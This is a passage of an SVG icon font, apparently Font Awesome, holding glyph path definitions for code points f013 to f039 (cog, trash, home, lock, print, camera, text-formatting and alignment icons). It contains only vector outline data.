<glyph unicode="&#xf013;" d="M1024 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1536 749v-222q0 -12 -8 -23t-20 -13l-185 -28q-19 -54 -39 -91q35 -50 107 -138q10 -12 10 -25t-9 -23q-27 -37 -99 -108t-94 -71q-12 0 -26 9l-138 108q-44 -23 -91 -38 q-16 -136 -29 -186q-7 -28 -36 -28h-222q-14 0 -24.5 8.5t-11.5 21.5l-28 184q-49 16 -90 37l-141 -107q-10 -9 -25 -9q-14 0 -25 11q-126 114 -165 168q-7 10 -7 23q0 12 8 23q15 21 51 66.5t54 70.5q-27 50 -41 99l-183 27q-13 2 -21 12.5t-8 23.5v222q0 12 8 23t19 13 l186 28q14 46 39 92q-40 57 -107 138q-10 12 -10 24q0 10 9 23q26 36 98.5 107.5t94.5 71.5q13 0 26 -10l138 -107q44 23 91 38q16 136 29 186q7 28 36 28h222q14 0 24.5 -8.5t11.5 -21.5l28 -184q49 -16 90 -37l142 107q9 9 24 9q13 0 25 -10q129 -119 165 -170q7 -8 7 -22 q0 -12 -8 -23q-15 -21 -51 -66.5t-54 -70.5q26 -50 41 -98l183 -28q13 -2 21 -12.5t8 -23.5z" />
<glyph unicode="&#xf014;" horiz-adv-x="1408" d="M512 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM768 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1024 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576 q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1152 76v948h-896v-948q0 -22 7 -40.5t14.5 -27t10.5 -8.5h832q3 0 10.5 8.5t14.5 27t7 40.5zM480 1152h448l-48 117q-7 9 -17 11h-317q-10 -2 -17 -11zM1408 1120v-64q0 -14 -9 -23t-23 -9h-96v-948q0 -83 -47 -143.5t-113 -60.5h-832 q-66 0 -113 58.5t-47 141.5v952h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h309l70 167q15 37 54 63t79 26h320q40 0 79 -26t54 -63l70 -167h309q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf015;" horiz-adv-x="1664" d="M1408 544v-480q0 -26 -19 -45t-45 -19h-384v384h-256v-384h-384q-26 0 -45 19t-19 45v480q0 1 0.5 3t0.5 3l575 474l575 -474q1 -2 1 -6zM1631 613l-62 -74q-8 -9 -21 -11h-3q-13 0 -21 7l-692 577l-692 -577q-12 -8 -24 -7q-13 2 -21 11l-62 74q-8 10 -7 23.5t11 21.5 l719 599q32 26 76 26t76 -26l244 -204v195q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-408l219 -182q10 -8 11 -21.5t-7 -23.5z" />
<glyph unicode="&#xf016;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z " />
<glyph unicode="&#xf017;" d="M896 992v-448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf018;" horiz-adv-x="1920" d="M1111 540v4l-24 320q-1 13 -11 22.5t-23 9.5h-186q-13 0 -23 -9.5t-11 -22.5l-24 -320v-4q-1 -12 8 -20t21 -8h244q12 0 21 8t8 20zM1870 73q0 -73 -46 -73h-704q13 0 22 9.5t8 22.5l-20 256q-1 13 -11 22.5t-23 9.5h-272q-13 0 -23 -9.5t-11 -22.5l-20 -256 q-1 -13 8 -22.5t22 -9.5h-704q-46 0 -46 73q0 54 26 116l417 1044q8 19 26 33t38 14h339q-13 0 -23 -9.5t-11 -22.5l-15 -192q-1 -14 8 -23t22 -9h166q13 0 22 9t8 23l-15 192q-1 13 -11 22.5t-23 9.5h339q20 0 38 -14t26 -33l417 -1044q26 -62 26 -116z" />
<glyph unicode="&#xf019;" horiz-adv-x="1664" d="M1280 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 416v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h465l135 -136 q58 -56 136 -56t136 56l136 136h464q40 0 68 -28t28 -68zM1339 985q17 -41 -14 -70l-448 -448q-18 -19 -45 -19t-45 19l-448 448q-31 29 -14 70q17 39 59 39h256v448q0 26 19 45t45 19h256q26 0 45 -19t19 -45v-448h256q42 0 59 -39z" />
<glyph unicode="&#xf01a;" d="M1120 608q0 -12 -10 -24l-319 -319q-11 -9 -23 -9t-23 9l-320 320q-15 16 -7 35q8 20 30 20h192v352q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-352h192q14 0 23 -9t9 -23zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273 t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf01b;" d="M1118 660q-8 -20 -30 -20h-192v-352q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v352h-192q-14 0 -23 9t-9 23q0 12 10 24l319 319q11 9 23 9t23 -9l320 -320q15 -16 7 -35zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198 t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf01c;" d="M1023 576h316q-1 3 -2.5 8t-2.5 8l-212 496h-708l-212 -496q-1 -2 -2.5 -8t-2.5 -8h316l95 -192h320zM1536 546v-482q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v482q0 62 25 123l238 552q10 25 36.5 42t52.5 17h832q26 0 52.5 -17t36.5 -42l238 -552 q25 -61 25 -123z" />
<glyph unicode="&#xf01d;" d="M1184 640q0 -37 -32 -55l-544 -320q-15 -9 -32 -9q-16 0 -32 8q-32 19 -32 56v640q0 37 32 56q33 18 64 -1l544 -320q32 -18 32 -55zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf01e;" d="M1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l138 138q-148 137 -349 137q-104 0 -198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5q119 0 225 52t179 147q7 10 23 12q14 0 25 -9 l137 -138q9 -8 9.5 -20.5t-7.5 -22.5q-109 -132 -264 -204.5t-327 -72.5q-156 0 -298 61t-245 164t-164 245t-61 298t61 298t164 245t245 164t298 61q147 0 284.5 -55.5t244.5 -156.5l130 129q29 31 70 14q39 -17 39 -59z" />
<glyph unicode="&#xf021;" d="M1511 480q0 -5 -1 -7q-64 -268 -268 -434.5t-478 -166.5q-146 0 -282.5 55t-243.5 157l-129 -129q-19 -19 -45 -19t-45 19t-19 45v448q0 26 19 45t45 19h448q26 0 45 -19t19 -45t-19 -45l-137 -137q71 -66 161 -102t187 -36q134 0 250 65t186 179q11 17 53 117 q8 23 30 23h192q13 0 22.5 -9.5t9.5 -22.5zM1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-26 0 -45 19t-19 45t19 45l138 138q-148 137 -349 137q-134 0 -250 -65t-186 -179q-11 -17 -53 -117q-8 -23 -30 -23h-199q-13 0 -22.5 9.5t-9.5 22.5v7q65 268 270 434.5t480 166.5 q146 0 284 -55.5t245 -156.5l130 129q19 19 45 19t45 -19t19 -45z" />
<glyph unicode="&#xf022;" horiz-adv-x="1792" d="M384 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M384 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1536 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5z M1536 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5zM1536 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5 t9.5 -22.5zM1664 160v832q0 13 -9.5 22.5t-22.5 9.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1792 1248v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47 t47 -113z" />
<glyph unicode="&#xf023;" horiz-adv-x="1152" d="M320 768h512v192q0 106 -75 181t-181 75t-181 -75t-75 -181v-192zM1152 672v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v192q0 184 132 316t316 132t316 -132t132 -316v-192h32q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf024;" horiz-adv-x="1792" d="M320 1280q0 -72 -64 -110v-1266q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v1266q-64 38 -64 110q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -25 -12.5 -38.5t-39.5 -27.5q-215 -116 -369 -116q-61 0 -123.5 22t-108.5 48 t-115.5 48t-142.5 22q-192 0 -464 -146q-17 -9 -33 -9q-26 0 -45 19t-19 45v742q0 32 31 55q21 14 79 43q236 120 421 120q107 0 200 -29t219 -88q38 -19 88 -19q54 0 117.5 21t110 47t88 47t54.5 21q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf025;" horiz-adv-x="1664" d="M1664 650q0 -166 -60 -314l-20 -49l-185 -33q-22 -83 -90.5 -136.5t-156.5 -53.5v-32q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-32q71 0 130 -35.5t93 -95.5l68 12q29 95 29 193q0 148 -88 279t-236.5 209t-315.5 78 t-315.5 -78t-236.5 -209t-88 -279q0 -98 29 -193l68 -12q34 60 93 95.5t130 35.5v32q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v32q-88 0 -156.5 53.5t-90.5 136.5l-185 33l-20 49q-60 148 -60 314q0 151 67 291t179 242.5 t266 163.5t320 61t320 -61t266 -163.5t179 -242.5t67 -291z" />
<glyph unicode="&#xf026;" horiz-adv-x="768" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45z" />
<glyph unicode="&#xf027;" horiz-adv-x="1152" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 35.5 t12 57t-12 57t-29 35.5t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142z" />
<glyph unicode="&#xf028;" horiz-adv-x="1664" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 35.5 t12 57t-12 57t-29 35.5t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142zM1408 640q0 -153 -85 -282.5t-225 -188.5q-13 -5 -25 -5q-27 0 -46 19t-19 45q0 39 39 59q56 29 76 44q74 54 115.5 135.5t41.5 173.5t-41.5 173.5 t-115.5 135.5q-20 15 -76 44q-39 20 -39 59q0 26 19 45t45 19q13 0 26 -5q140 -59 225 -188.5t85 -282.5zM1664 640q0 -230 -127 -422.5t-338 -283.5q-13 -5 -26 -5q-26 0 -45 19t-19 45q0 36 39 59q7 4 22.5 10.5t22.5 10.5q46 25 82 51q123 91 192 227t69 289t-69 289 t-192 227q-36 26 -82 51q-7 4 -22.5 10.5t-22.5 10.5q-39 23 -39 59q0 26 19 45t45 19q13 0 26 -5q211 -91 338 -283.5t127 -422.5z" />
<glyph unicode="&#xf029;" horiz-adv-x="1408" d="M384 384v-128h-128v128h128zM384 1152v-128h-128v128h128zM1152 1152v-128h-128v128h128zM128 129h384v383h-384v-383zM128 896h384v384h-384v-384zM896 896h384v384h-384v-384zM640 640v-640h-640v640h640zM1152 128v-128h-128v128h128zM1408 128v-128h-128v128h128z M1408 640v-384h-384v128h-128v-384h-128v640h384v-128h128v128h128zM640 1408v-640h-640v640h640zM1408 1408v-640h-640v640h640z" />
<glyph unicode="&#xf02a;" horiz-adv-x="1792" d="M63 0h-63v1408h63v-1408zM126 1h-32v1407h32v-1407zM220 1h-31v1407h31v-1407zM377 1h-31v1407h31v-1407zM534 1h-62v1407h62v-1407zM660 1h-31v1407h31v-1407zM723 1h-31v1407h31v-1407zM786 1h-31v1407h31v-1407zM943 1h-63v1407h63v-1407zM1100 1h-63v1407h63v-1407z M1226 1h-63v1407h63v-1407zM1352 1h-63v1407h63v-1407zM1446 1h-63v1407h63v-1407zM1635 1h-94v1407h94v-1407zM1698 1h-32v1407h32v-1407zM1792 0h-63v1408h63v-1408z" />
<glyph unicode="&#xf02b;" d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5 l715 -714q37 -39 37 -91z" />
<glyph unicode="&#xf02c;" horiz-adv-x="1920" d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5 l715 -714q37 -39 37 -91zM1899 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-36 0 -59 14t-53 45l470 470q37 37 37 90q0 52 -37 91l-715 714q-38 38 -102 64.5t-117 26.5h224q53 0 117 -26.5t102 -64.5l715 -714q37 -39 37 -91z" />
<glyph unicode="&#xf02d;" horiz-adv-x="1664" d="M1639 1058q40 -57 18 -129l-275 -906q-19 -64 -76.5 -107.5t-122.5 -43.5h-923q-77 0 -148.5 53.5t-99.5 131.5q-24 67 -2 127q0 4 3 27t4 37q1 8 -3 21.5t-3 19.5q2 11 8 21t16.5 23.5t16.5 23.5q23 38 45 91.5t30 91.5q3 10 0.5 30t-0.5 28q3 11 17 28t17 23 q21 36 42 92t25 90q1 9 -2.5 32t0.5 28q4 13 22 30.5t22 22.5q19 26 42.5 84.5t27.5 96.5q1 8 -3 25.5t-2 26.5q2 8 9 18t18 23t17 21q8 12 16.5 30.5t15 35t16 36t19.5 32t26.5 23.5t36 11.5t47.5 -5.5l-1 -3q38 9 51 9h761q74 0 114 -56t18 -130l-274 -906 q-36 -119 -71.5 -153.5t-128.5 -34.5h-869q-27 0 -38 -15q-11 -16 -1 -43q24 -70 144 -70h923q29 0 56 15.5t35 41.5l300 987q7 22 5 57q38 -15 59 -43zM575 1056q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5 t-16.5 -22.5zM492 800q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5t-16.5 -22.5z" />
<glyph unicode="&#xf02e;" horiz-adv-x="1280" d="M1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
<glyph unicode="&#xf02f;" horiz-adv-x="1664" d="M384 0h896v256h-896v-256zM384 640h896v384h-160q-40 0 -68 28t-28 68v160h-640v-640zM1536 576q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 576v-416q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-160q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68 v160h-224q-13 0 -22.5 9.5t-9.5 22.5v416q0 79 56.5 135.5t135.5 56.5h64v544q0 40 28 68t68 28h672q40 0 88 -20t76 -48l152 -152q28 -28 48 -76t20 -88v-256h64q79 0 135.5 -56.5t56.5 -135.5z" />
<glyph unicode="&#xf030;" horiz-adv-x="1920" d="M960 864q119 0 203.5 -84.5t84.5 -203.5t-84.5 -203.5t-203.5 -84.5t-203.5 84.5t-84.5 203.5t84.5 203.5t203.5 84.5zM1664 1280q106 0 181 -75t75 -181v-896q0 -106 -75 -181t-181 -75h-1408q-106 0 -181 75t-75 181v896q0 106 75 181t181 75h224l51 136 q19 49 69.5 84.5t103.5 35.5h512q53 0 103.5 -35.5t69.5 -84.5l51 -136h224zM960 128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf031;" horiz-adv-x="1664" d="M725 977l-170 -450q33 0 136.5 -2t160.5 -2q19 0 57 2q-87 253 -184 452zM0 -128l2 79q23 7 56 12.5t57 10.5t49.5 14.5t44.5 29t31 50.5l237 616l280 724h75h53q8 -14 11 -21l205 -480q33 -78 106 -257.5t114 -274.5q15 -34 58 -144.5t72 -168.5q20 -45 35 -57 q19 -15 88 -29.5t84 -20.5q6 -38 6 -57q0 -4 -0.5 -13t-0.5 -13q-63 0 -190 8t-191 8q-76 0 -215 -7t-178 -8q0 43 4 78l131 28q1 0 12.5 2.5t15.5 3.5t14.5 4.5t15 6.5t11 8t9 11t2.5 14q0 16 -31 96.5t-72 177.5t-42 100l-450 2q-26 -58 -76.5 -195.5t-50.5 -162.5 q0 -22 14 -37.5t43.5 -24.5t48.5 -13.5t57 -8.5t41 -4q1 -19 1 -58q0 -9 -2 -27q-58 0 -174.5 10t-174.5 10q-8 0 -26.5 -4t-21.5 -4q-80 -14 -188 -14z" />
<glyph unicode="&#xf032;" horiz-adv-x="1408" d="M555 15q74 -32 140 -32q376 0 376 335q0 114 -41 180q-27 44 -61.5 74t-67.5 46.5t-80.5 25t-84 10.5t-94.5 2q-73 0 -101 -10q0 -53 -0.5 -159t-0.5 -158q0 -8 -1 -67.5t-0.5 -96.5t4.5 -83.5t12 -66.5zM541 761q42 -7 109 -7q82 0 143 13t110 44.5t74.5 89.5t25.5 142 q0 70 -29 122.5t-79 82t-108 43.5t-124 14q-50 0 -130 -13q0 -50 4 -151t4 -152q0 -27 -0.5 -80t-0.5 -79q0 -46 1 -69zM0 -128l2 94q15 4 85 16t106 27q7 12 12.5 27t8.5 33.5t5.5 32.5t3 37.5t0.5 34v35.5v30q0 982 -22 1025q-4 8 -22 14.5t-44.5 11t-49.5 7t-48.5 4.5 t-30.5 3l-4 83q98 2 340 11.5t373 9.5q23 0 68.5 -0.5t67.5 -0.5q70 0 136.5 -13t128.5 -42t108 -71t74 -104.5t28 -137.5q0 -52 -16.5 -95.5t-39 -72t-64.5 -57.5t-73 -45t-84 -40q154 -35 256.5 -134t102.5 -248q0 -100 -35 -179.5t-93.5 -130.5t-138 -85.5t-163.5 -48.5 t-176 -14q-44 0 -132 3t-132 3q-106 0 -307 -11t-231 -12z" />
<glyph unicode="&#xf033;" horiz-adv-x="1024" d="M0 -126l17 85q6 2 81.5 21.5t111.5 37.5q28 35 41 101q1 7 62 289t114 543.5t52 296.5v25q-24 13 -54.5 18.5t-69.5 8t-58 5.5l19 103q33 -2 120 -6.5t149.5 -7t120.5 -2.5q48 0 98.5 2.5t121 7t98.5 6.5q-5 -39 -19 -89q-30 -10 -101.5 -28.5t-108.5 -33.5 q-8 -19 -14 -42.5t-9 -40t-7.5 -45.5t-6.5 -42q-27 -148 -87.5 -419.5t-77.5 -355.5q-2 -9 -13 -58t-20 -90t-16 -83.5t-6 -57.5l1 -18q17 -4 185 -31q-3 -44 -16 -99q-11 0 -32.5 -1.5t-32.5 -1.5q-29 0 -87 10t-86 10q-138 2 -206 2q-51 0 -143 -9t-121 -11z" />
<glyph unicode="&#xf034;" horiz-adv-x="1792" d="M1744 128q33 0 42 -18.5t-11 -44.5l-126 -162q-20 -26 -49 -26t-49 26l-126 162q-20 26 -11 44.5t42 18.5h80v1024h-80q-33 0 -42 18.5t11 44.5l126 162q20 26 49 26t49 -26l126 -162q20 -26 11 -44.5t-42 -18.5h-80v-1024h80zM81 1407l54 -27q12 -5 211 -5q44 0 132 2 t132 2q36 0 107.5 -0.5t107.5 -0.5h293q6 0 21 -0.5t20.5 0t16 3t17.5 9t15 17.5l42 1q4 0 14 -0.5t14 -0.5q2 -112 2 -336q0 -80 -5 -109q-39 -14 -68 -18q-25 44 -54 128q-3 9 -11 48t-14.5 73.5t-7.5 35.5q-6 8 -12 12.5t-15.5 6t-13 2.5t-18 0.5t-16.5 -0.5 q-17 0 -66.5 0.5t-74.5 0.5t-64 -2t-71 -6q-9 -81 -8 -136q0 -94 2 -388t2 -455q0 -16 -2.5 -71.5t0 -91.5t12.5 -69q40 -21 124 -42.5t120 -37.5q5 -40 5 -50q0 -14 -3 -29l-34 -1q-76 -2 -218 8t-207 10q-50 0 -151 -9t-152 -9q-3 51 -3 52v9q17 27 61.5 43t98.5 29t78 27 q19 42 19 383q0 101 -3 303t-3 303v117q0 2 0.5 15.5t0.5 25t-1 25.5t-3 24t-5 14q-11 12 -162 12q-33 0 -93 -12t-80 -26q-19 -13 -34 -72.5t-31.5 -111t-42.5 -53.5q-42 26 -56 44v383z" />
<glyph unicode="&#xf035;" d="M81 1407l54 -27q12 -5 211 -5q44 0 132 2t132 2q70 0 246.5 1t304.5 0.5t247 -4.5q33 -1 56 31l42 1q4 0 14 -0.5t14 -0.5q2 -112 2 -336q0 -80 -5 -109q-39 -14 -68 -18q-25 44 -54 128q-3 9 -11 47.5t-15 73.5t-7 36q-10 13 -27 19q-5 2 -66 2q-30 0 -93 1t-103 1 t-94 -2t-96 -7q-9 -81 -8 -136l1 -152v52q0 -55 1 -154t1.5 -180t0.5 -153q0 -16 -2.5 -71.5t0 -91.5t12.5 -69q40 -21 124 -42.5t120 -37.5q5 -40 5 -50q0 -14 -3 -29l-34 -1q-76 -2 -218 8t-207 10q-50 0 -151 -9t-152 -9q-3 51 -3 52v9q17 27 61.5 43t98.5 29t78 27 q7 16 11.5 74t6 145.5t1.5 155t-0.5 153.5t-0.5 89q0 7 -2.5 21.5t-2.5 22.5q0 7 0.5 44t1 73t0 76.5t-3 67.5t-6.5 32q-11 12 -162 12q-41 0 -163 -13.5t-138 -24.5q-19 -12 -34 -71.5t-31.5 -111.5t-42.5 -54q-42 26 -56 44v383zM1310 125q12 0 42 -19.5t57.5 -41.5 t59.5 -49t36 -30q26 -21 26 -49t-26 -49q-4 -3 -36 -30t-59.5 -49t-57.5 -41.5t-42 -19.5q-13 0 -20.5 10.5t-10 28.5t-2.5 33.5t1.5 33t1.5 19.5h-1024q0 -2 1.5 -19.5t1.5 -33t-2.5 -33.5t-10 -28.5t-20.5 -10.5q-12 0 -42 19.5t-57.5 41.5t-59.5 49t-36 30q-26 21 -26 49 t26 49q4 3 36 30t59.5 49t57.5 41.5t42 19.5q13 0 20.5 -10.5t10 -28.5t2.5 -33.5t-1.5 -33t-1.5 -19.5h1024q0 2 -1.5 19.5t-1.5 33t2.5 33.5t10 28.5t20.5 10.5z" />
<glyph unicode="&#xf036;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45 t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf037;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h896q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45t-45 -19 h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h640q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf038;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45 t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf039;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45 t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
